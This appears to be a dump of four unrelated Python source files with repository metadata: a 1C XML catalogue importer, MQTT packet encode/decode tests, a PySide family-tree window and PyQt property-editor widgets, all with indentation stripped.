# parser.add_argument('delivery_id', nargs='+', type=int)
def handle(self, *args, **options):
cwd = os.getcwd()
cwd = os.path.join(cwd, 'db')
for name in os.listdir(cwd):
path_and_filename = os.path.join(cwd, name)
if os.path.isfile(path_and_filename, ) and name == 'import.xml':
root = ET.parse(source=path_and_filename).getroot()
for elem_level1 in root:
# print 'level1', elem_level1, elem_level1.tag, elem_level1.attrib, elem_level1.text
if elem_level1.tag == u'Классификатор':
elems_level1 = list(elem_level1)
for elem_level2_Indx, elem_level2 in enumerate(elems_level1):
# print 'level2', elem_level2_Indx, elem_level2, elem_level2.tag, elem_level2.attrib, elem_level2.text
if elem_level2.tag == u'Наименование'\
and elem_level2.text == u'Классификатор (Каталог товаров)'\
and elems_level1[elem_level2_Indx+1].tag == u'Группы':
elems_level2 = list(elems_level1[elem_level2_Indx+1])
for elem_level3_Indx, elem_level3 in enumerate(elems_level2):
# print 'level3', elem_level3_Indx, elem_level3, elem_level3.tag, elem_level3.attrib, elem_level3.text
elems_level3 = list(elem_level3)
for elem_level4_Indx, elem_level4 in enumerate(elems_level3):
# print 'level4', elem_level4_Indx, elem_level4, elem_level4.tag, elem_level4.attrib, elem_level4.text
if elem_level4.tag == u'Наименование' \
and elem_level4.text == u'Товары' \
and elems_level3[elem_level4_Indx + 1].tag == u'Группы':
elems_level4 = list(elems_level3[elem_level4_Indx + 1])
for elem_level5_Indx, elem_level5 in enumerate(elems_level4):
# print 'level5', elem_level5_Indx, elem_level5, elem_level5.tag, elem_level5.attrib, elem_level5.text
if elem_level5.tag == u'Группа':
try:
elems_level5 = list(elems_level4[elem_level5_Indx])
for elem_level6_Indx, elem_level6 in enumerate(elems_level5):
# print 'level6', elem_level6_Indx, elem_level6, elem_level6.tag, elem_level6.attrib, elem_level6.text
if elem_level6.tag == u'Ид' and elems_level5[elem_level6_Indx + 1].tag == u'Наименование':
dict_elem_level6 = {'Id': elem_level6.text, 'Name': elems_level5[elem_level6_Indx + 1].text, }
parent_cat6 = search_in_category(name=dict_elem_level6['Name'], id_1c=dict_elem_level6['Id'])
#print 'level6: ', dict_elem_level6, parent_cat6
if elem_level6.tag == u'Группы':
elems_level6 = list(elems_level5[elem_level6_Indx])
for elem_level7_Indx, elem_level7 in enumerate(elems_level6):
# print 'level7', elem_level7_Indx, elem_level7, elem_level7.tag, elem_level7.attrib, elem_level7.text
if elem_level7.tag == u'Группа':
try:
elems_level7 = list(elems_level6[elem_level7_Indx])
for elem_level8_Indx, elem_level8 in enumerate(elems_level7):
# print 'level8', elem_level8_Indx, elem_level8, elem_level8.tag, elem_level8.attrib, elem_level8.text
if elem_level8.tag == u'Ид' and elems_level7[elem_level8_Indx + 1].tag == u'Наименование':
dict_elem_level8 = {'Id': elem_level8.text, 'Name': elems_level7[elem_level8_Indx + 1].text, }
parent_cat8 = search_in_category(name=dict_elem_level8['Name'], id_1c=dict_elem_level8['Id'], parent=parent_cat6)
#print 'level6: ', dict_elem_level6, parent_cat8
if elem_level8.tag == u'Группы':
elems_level8 = list(elems_level7[elem_level8_Indx])
for elem_level9_Indx, elem_level9 in enumerate(elems_level8):
# print 'level9', elem_level9_Indx, elem_level9, elem_level9.tag, elem_level9.attrib, elem_level9.text
if elem_level9.tag == u'Группа':
try:
elems_level9 = list(elems_level8[elem_level9_Indx])
for elem_level10_Indx, elem_level10 in enumerate(elems_level9):
# print 'level10', elem_level10_Indx, elem_level10, elem_level10.tag, elem_level8.attrib, elem_level10.text
if elem_level10.tag == u'Ид' and elems_level9[elem_level10_Indx + 1].tag == u'Наименование':
dict_elem_level10 = {'Id': elem_level10.text, 'Name': elems_level9[elem_level10_Indx + 1].text, }
parent_cat10 = search_in_category(name=dict_elem_level10['Name'], id_1c=dict_elem_level10['Id'], parent=parent_cat8)
#print 'level6: ', dict_elem_level6, parent_cat10
if elem_level10.tag == u'Группы':
level10 = True
except IndexError:
pass
except IndexError:
pass
except IndexError:
pass
if elem_level1.tag == u'Каталог':
elems_level1 = list(elem_level1)
for elem_level2_Indx, elem_level2 in enumerate(elems_level1):
print('level2', elem_level2_Indx, elem_level2, elem_level2.tag, elem_level2.attrib, elem_level2.text, )
if elem_level2.tag == u'Наименование' \
and elem_level2.text == u'Каталог товаров' \
and elems_level1[elem_level2_Indx + 1].tag == u'Товары':
elems_level2 = list(elems_level1[elem_level2_Indx + 1])
for elem_level3_Indx, elem_level3 in enumerate(elems_level2):
# print 'level3', elem_level3_Indx, elem_level3, elem_level3.tag, elem_level3.attrib, elem_level3.text
if elem_level3.tag == u'Товар':
elems_level3 = list(elem_level3)
for elem_level4_Indx, elem_level4 in enumerate(elems_level3):
# print 'level4', elem_level4_Indx, elem_level4, elem_level4.tag, elem_level4.attrib, elem_level4.text
if elem_level4.tag == u'Ид':
id_1c_prod = elem_level4.text
if elems_level3[elem_level4_Indx + 1].tag == u'Артикул':
articul = elems_level3[elem_level4_Indx + 1].text
if elems_level3[elem_level4_Indx + 2].tag == u'Наименование':
name = elems_level3[elem_level4_Indx + 2].text
if elem_level4.tag == u'Группы':
elems_level4 = list(elems_level3[elem_level4_Indx])
for elem_level5_Indx, elem_level5 in enumerate(elems_level4):
# print 'level5', elem_level5_Indx, elem_level5, elem_level5.tag, elem_level5.attrib, elem_level5.text
if elem_level5.tag == u'Ид':
id_1c_cat = elem_level5.text
if 'level10' in locals():
print('level10', )
|
apache-2.0
| -4,928,253,206,802,143,000
| 60.794118
| 220
| 0.399889
| false
| 4.497324
| false
| false
| false
|
astrorafael/twisted-mqtt
|
mqtt/test/test_pdu.py
|
1
|
20218
|
# ----------------------------------------------------------------------
# Copyright (C) 2015 by Rafael Gonzalez
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ----------------------------------------------------------------------
from twisted.trial import unittest
from twisted.test import proto_helpers
from mqtt import v31, v311
from mqtt.pdu import (
CONNECT,
CONNACK,
DISCONNECT,
PINGREQ,
PINGRES,
SUBSCRIBE,
SUBACK,
UNSUBSCRIBE,
UNSUBACK,
PUBLISH,
PUBACK,
PUBREC,
PUBREL,
PUBCOMP,
)
class PDUTestCase(unittest.TestCase):
def test_CONNECT_encdec(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.version = v31
request.keepalive = 0
request.willTopic = None
request.willMessage = None
request.willQoS = None
request.willRetain = None
request.username = None
request.password = None
request.cleanStart = True
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_keepalive(self):
request = CONNECT()
response = CONNECT()
request.version = v31
request.clientId = "client-foo"
request.keepalive = 12
request.willTopic = None
request.willMessage = None
request.willQoS = None
request.willRetain = None
request.username = None
request.password = None
request.cleanStart = True
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
self.assertEqual(request.version, response.version)
def test_CONNECT_encdec_willTopic(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 1
request.willTopic = "foo-topic"
request.willMessage = ""
request.willQoS = 1
request.willRetain = False
request.username = None
request.password = None
request.cleanStart = True
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_willMessage(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 1
request.willTopic = "foo-topic"
request.willMessage = "Hello World"
request.willQoS = 2
request.willRetain = False
request.username = None
request.password = None
request.cleanStart = True
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_willRetain(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 1
request.willTopic = "foo-topic"
request.willMessage = "Hello World"
request.willQoS = 2
request.willRetain = True
request.username = None
request.password = None
request.cleanStart = True
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_userpass(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 12000
request.willTopic = "foo-topic"
request.willMessage = ""
request.willQoS = 0
request.willRetain = False
request.username = "foouser"
request.password = "foopasswd"
request.cleanStart = True
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password.decode(encoding='ascii', errors='ignore'))
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_session(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 1200
request.willTopic = "foo-topic"
request.willMessage = ""
request.willQoS = 1
request.willRetain = False
request.username = None
request.password = None
request.cleanStart = False
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_version(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 120
request.willTopic = "foo-topic"
request.willMessage = ""
request.willQoS = 0
request.willRetain = False
request.username = None
request.password = None
request.cleanStart = True
request.version = v311
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_PINGREQ_encdec(self):
request = PINGREQ()
response = PINGREQ()
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
def test_PINGRES_encdec(self):
request = PINGRES()
response = PINGRES()
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
def test_DISCONNECT_encdec(self):
request = DISCONNECT()
response = DISCONNECT()
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
def test_CONNACK_encdec(self):
request = CONNACK()
response = CONNACK()
request.session = True
request.resultCode = 2
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.session, response.session)
self.assertEqual(request.resultCode, response.resultCode)
def test_SUBSCRIBE_encdec(self):
request = SUBSCRIBE()
response = SUBSCRIBE()
request.topics = [('foo', 1), ('bar',0), ('baz',2)]
request.msgId = 5
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.topics, response.topics)
def test_SUBACK_encdec(self):
request = SUBACK()
response = SUBACK()
request.msgId = 5
request.granted = [(0, False), (0, True), (1,False), (1,True), (2,False), (2,True)]
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.granted, response.granted)
def test_UNSUBSCRIBE_encdec(self):
request = UNSUBSCRIBE()
response = UNSUBSCRIBE()
request.topics = ['foo', 'bar', 'baz']
request.msgId = 6
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.topics, response.topics)
def test_UNSUBACK_encdec(self):
request = UNSUBACK()
response = UNSUBACK()
request.msgId = 5
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBACK_encdec(self):
request = PUBACK()
response = PUBACK()
request.msgId = 65535
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBREC_encdec(self):
request = PUBREC()
response = PUBREC()
request.msgId = 30001
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBREL_encdec(self):
request = PUBREL()
response = PUBREL()
request.msgId = 30002
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBCOMP_encdec(self):
request = PUBCOMP()
response = PUBCOMP()
request.msgId = 30002
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBLISH_encdec(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = None
request.qos = 0
request.dup = False
request.retain = False
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_qos(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = False
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_dup(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = True
request.retain = False
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_retain(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_payload_str(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = ""
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_payload_bytearray(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = bytearray(5)
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload)
class PDUTestCase2(unittest.TestCase):
def test_PUBREC_enc_fail1(self):
request = PUBACK()
response = PUBACK()
request.msgId = -1
self.assertRaises(ValueError, request.encode)
def test_PUBREC_enc_fail2(self):
request = PUBACK()
response = PUBACK()
request.msgId = 2000000
self.assertRaises(ValueError, request.encode)
def test_PUBLISH_encdec_payload_int(self):
request = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = 65537
self.assertRaises(TypeError, request.encode)
def test_PUBLISH_encdec_payload_float(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = 12.25
self.assertRaises(TypeError, request.encode)
|
mit
| 5,394,915,169,349,317,000
| 38.565558
| 106
| 0.633594
| false
| 4.086095
| true
| false
| false
|
DayGitH/Family-Tree
|
mainwindow1.py
|
1
|
7475
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '.\mainwindow.ui'
#
# Created: Wed Dec 17 21:45:47 2014
# by: pyside-uic 0.2.15 running on PySide 1.2.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(640, 480)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setIconSize(QtCore.QSize(32, 32))
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtGui.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.graphicsView = QtGui.QGraphicsView(self.centralwidget)
self.graphicsView.setResizeAnchor(QtGui.QGraphicsView.AnchorUnderMouse)
self.graphicsView.setObjectName("graphicsView")
self.gridLayout.addWidget(self.graphicsView, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 640, 21))
self.menubar.setObjectName("menubar")
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName("menuFile")
self.menu_New = QtGui.QMenu(self.menuFile)
self.menu_New.setObjectName("menu_New")
self.menuEdit = QtGui.QMenu(self.menuFile)
self.menuEdit.setObjectName("menuEdit")
self.menuTrees = QtGui.QMenu(self.menubar)
self.menuTrees.setObjectName("menuTrees")
self.menuAbout = QtGui.QMenu(self.menubar)
self.menuAbout.setObjectName("menuAbout")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionNew_Person = QtGui.QAction(MainWindow)
self.actionNew_Person.setObjectName("actionNew_Person")
self.actionNew_Relationship = QtGui.QAction(MainWindow)
self.actionNew_Relationship.setObjectName("actionNew_Relationship")
self.actionEdit_Person = QtGui.QAction(MainWindow)
self.actionEdit_Person.setObjectName("actionEdit_Person")
self.actionEdit_Relationship = QtGui.QAction(MainWindow)
self.actionEdit_Relationship.setObjectName("actionEdit_Relationship")
self.actionSave_Tree = QtGui.QAction(MainWindow)
self.actionSave_Tree.setObjectName("actionSave_Tree")
self.actionLoad_Tree = QtGui.QAction(MainWindow)
self.actionLoad_Tree.setObjectName("actionLoad_Tree")
self.actionNew_Tree = QtGui.QAction(MainWindow)
self.actionNew_Tree.setObjectName("actionNew_Tree")
self.actionExit = QtGui.QAction(MainWindow)
self.actionExit.setObjectName("actionExit")
self.actionDescendants = QtGui.QAction(MainWindow)
self.actionDescendants.setObjectName("actionDescendants")
self.actionHourglass = QtGui.QAction(MainWindow)
self.actionHourglass.setObjectName("actionHourglass")
self.actionPython = QtGui.QAction(MainWindow)
self.actionPython.setObjectName("actionPython")
self.actionPyside = QtGui.QAction(MainWindow)
self.actionPyside.setObjectName("actionPyside")
self.actionFamily_Tree = QtGui.QAction(MainWindow)
self.actionFamily_Tree.setObjectName("actionFamily_Tree")
self.menu_New.addAction(self.actionNew_Person)
self.menu_New.addAction(self.actionNew_Relationship)
self.menu_New.addAction(self.actionNew_Tree)
self.menuEdit.addAction(self.actionEdit_Person)
self.menuEdit.addAction(self.actionEdit_Relationship)
self.menuFile.addAction(self.menu_New.menuAction())
self.menuFile.addAction(self.menuEdit.menuAction())
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionSave_Tree)
self.menuFile.addAction(self.actionLoad_Tree)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionExit)
self.menuTrees.addAction(self.actionDescendants)
self.menuTrees.addAction(self.actionHourglass)
self.menuAbout.addAction(self.actionPython)
self.menuAbout.addAction(self.actionPyside)
self.menuAbout.addAction(self.actionFamily_Tree)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuTrees.menuAction())
self.menubar.addAction(self.menuAbout.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "My Family Tree", None, QtGui.QApplication.UnicodeUTF8))
self.menuFile.setTitle(QtGui.QApplication.translate("MainWindow", "File", None, QtGui.QApplication.UnicodeUTF8))
self.menu_New.setTitle(QtGui.QApplication.translate("MainWindow", "New", None, QtGui.QApplication.UnicodeUTF8))
self.menuEdit.setTitle(QtGui.QApplication.translate("MainWindow", "Edit", None, QtGui.QApplication.UnicodeUTF8))
self.menuTrees.setTitle(QtGui.QApplication.translate("MainWindow", "Trees", None, QtGui.QApplication.UnicodeUTF8))
self.menuAbout.setTitle(QtGui.QApplication.translate("MainWindow", "About", None, QtGui.QApplication.UnicodeUTF8))
self.actionNew_Person.setText(QtGui.QApplication.translate("MainWindow", "New Person", None, QtGui.QApplication.UnicodeUTF8))
self.actionNew_Relationship.setText(QtGui.QApplication.translate("MainWindow", "New Relationship", None, QtGui.QApplication.UnicodeUTF8))
self.actionEdit_Person.setText(QtGui.QApplication.translate("MainWindow", "Edit Person", None, QtGui.QApplication.UnicodeUTF8))
self.actionEdit_Relationship.setText(QtGui.QApplication.translate("MainWindow", "Edit Relationship", None, QtGui.QApplication.UnicodeUTF8))
self.actionSave_Tree.setText(QtGui.QApplication.translate("MainWindow", "Save Tree", None, QtGui.QApplication.UnicodeUTF8))
self.actionLoad_Tree.setText(QtGui.QApplication.translate("MainWindow", "Load Tree", None, QtGui.QApplication.UnicodeUTF8))
self.actionNew_Tree.setText(QtGui.QApplication.translate("MainWindow", "New Tree", None, QtGui.QApplication.UnicodeUTF8))
self.actionExit.setText(QtGui.QApplication.translate("MainWindow", "Exit", None, QtGui.QApplication.UnicodeUTF8))
self.actionDescendants.setText(QtGui.QApplication.translate("MainWindow", "Descendants", None, QtGui.QApplication.UnicodeUTF8))
self.actionHourglass.setText(QtGui.QApplication.translate("MainWindow", "Hourglass", None, QtGui.QApplication.UnicodeUTF8))
self.actionPython.setText(QtGui.QApplication.translate("MainWindow", "Python", None, QtGui.QApplication.UnicodeUTF8))
self.actionPyside.setText(QtGui.QApplication.translate("MainWindow", "Pyside", None, QtGui.QApplication.UnicodeUTF8))
self.actionFamily_Tree.setText(QtGui.QApplication.translate("MainWindow", "Family Tree", None, QtGui.QApplication.UnicodeUTF8))
|
cc0-1.0
| -3,483,384,771,466,825,000
| 62.347458
| 147
| 0.734849
| false
| 4.082469
| false
| false
| false
|
spirali/shampoo
|
src/ui/editor.py
|
1
|
6904
|
#
# Copyright (C) 2014 Stanislav Bohm
#
# This file is part of Shampoo.
#
# Shampoo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# Shampoo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Shampoo. If not, see <http://www.gnu.org/licenses/>.
#
from base.pointers import make_pointer
from PyQt4.QtGui import QLineEdit, \
QFormLayout, \
QDoubleValidator, \
QGroupBox, \
QSpinBox, \
QHBoxLayout, \
QRegExpValidator, \
QComboBox, \
QCheckBox
import PyQt4.QtCore as QtCore
import logging
class EditorBase:
set_text = False
class FloatEditor(EditorBase):
def make_widget(self, pointer):
def value_changed(value):
try:
f = float(value)
except ValueError:
logging.debug("Float editor: Invalid value")
return
pointer.set(f)
#if call_update:
# owner.update()
widget = QLineEdit(str(pointer.get()))
widget.setValidator(QDoubleValidator())
widget.textEdited.connect(value_changed)
return widget
class StringEditor(EditorBase):
def __init__(self, regex=None, identifier=False):
if identifier:
assert not regex
regex=r'^[A-Za-z_][A-Za-z_\d]*$'
if regex:
self.regex = QtCore.QRegExp(regex)
else:
self.regex = None
def make_widget(self, pointer):
def value_changed(value):
pointer.set(value)
widget = QLineEdit(str(pointer.get()))
if self.regex is not None:
validator = QRegExpValidator(self.regex)
widget.setValidator(validator)
widget.textEdited.connect(value_changed)
return widget
class IntEditor(EditorBase):
def __init__(self, min_value, max_value):
self.min_value = min_value
self.max_value = max_value
def make_widget(self, pointer):
def value_changed(value):
pointer.set(value)
widget = QSpinBox()
widget.setMinimum(self.min_value)
widget.setMaximum(self.max_value)
widget.setValue(pointer.get())
widget.valueChanged.connect(value_changed)
return widget
class BoolEditor(EditorBase):
set_text = True
def __init__(self):
pass
def make_widget(self, pointer):
def value_changed(value):
pointer.set(value)
widget = QCheckBox()
#widget.valueChanged.connect(value_changed)
return widget
class ChooseEditor(EditorBase):
def __init__(self, options):
self.options = options
def make_widget(self, pointer):
widget = QComboBox()
for name, value in self.options:
widget.addItem(name)
values = [ value for name, value in self.options ]
widget.setCurrentIndex(values.index(pointer.get()))
return widget
class VertexEditor(EditorBase):
def __init__(self):
pass
def make_widget(self, pointer):
def value_changed():
try:
value_x = float(x.text())
value_y = float(y.text())
value_z = float(z.text())
except ValueError:
logging.debug("Float editor: Invalid value")
return
pointer.set((value_x, value_y, value_z))
vertex = pointer.get()
layout = QHBoxLayout()
x = QLineEdit(str(vertex[0]))
x.setValidator(QDoubleValidator())
x.textEdited.connect(value_changed)
layout.addWidget(x)
y = QLineEdit(str(vertex[1]))
y.setValidator(QDoubleValidator())
y.textEdited.connect(value_changed)
layout.addWidget(y)
z = QLineEdit(str(vertex[2]))
z.setValidator(QDoubleValidator())
z.textEdited.connect(value_changed)
layout.addWidget(z)
return layout
class Group:
def __init__(self, name):
self.name = name
self.items = []
def add(self, editor, name, attr, update_method):
self.items.append((editor, name, attr, update_method))
def make_widget(self, owner, layout):
def add_row(editor, name, attr, update_method):
if update_method:
update_callback = lambda: getattr(owner, update_method)()
else:
update_callback = None
pointer = make_pointer(owner, attr, update_callback)
widget = editor.make_widget(pointer)
if editor.set_text:
widget.setText(name)
form_layout.addRow(widget)
else:
form_layout.addRow(name, widget)
form_layout = QFormLayout()
box = QGroupBox(self.name);
layout.addWidget(box)
box.setLayout(form_layout)
for editor, name, attr, update_method in self.items:
add_row(editor, name, attr, update_method)
def add_float(self, name, attr, update_method="update"):
self.add(FloatEditor(), name, attr, update_method)
def add_int(self, name, attr, update_method="update", *args, **kw):
self.add(IntEditor(*args, **kw), name, attr, update_method)
